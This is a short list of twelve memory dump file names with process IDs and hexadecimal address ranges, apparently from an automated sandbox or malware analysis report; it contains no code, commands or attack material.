memory/1356-2246-0x00007FF650300000-0x00007FF6506F6000-memory.dmp

memory/5020-2244-0x00007FF694110000-0x00007FF694506000-memory.dmp

memory/3704-2243-0x00007FF71DD00000-0x00007FF71E0F6000-memory.dmp

memory/3460-2242-0x00007FF7328A0000-0x00007FF732C96000-memory.dmp

memory/3204-2249-0x00007FF6C5F30000-0x00007FF6C6326000-memory.dmp

memory/2080-2250-0x00007FF73DD70000-0x00007FF73E166000-memory.dmp

memory/4108-2251-0x00007FF768BE0000-0x00007FF768FD6000-memory.dmp

memory/1740-2253-0x00007FF6CE300000-0x00007FF6CE6F6000-memory.dmp

memory/3244-2252-0x00007FF71E090000-0x00007FF71E486000-memory.dmp

memory/936-2254-0x00007FF62F510000-0x00007FF62F906000-memory.dmp

memory/3008-2256-0x00007FF7C0150000-0x00007FF7C0546000-memory.dmp

memory/2204-2255-0x00007FF793DC0000-0x00007FF7941B6000-memory.dmp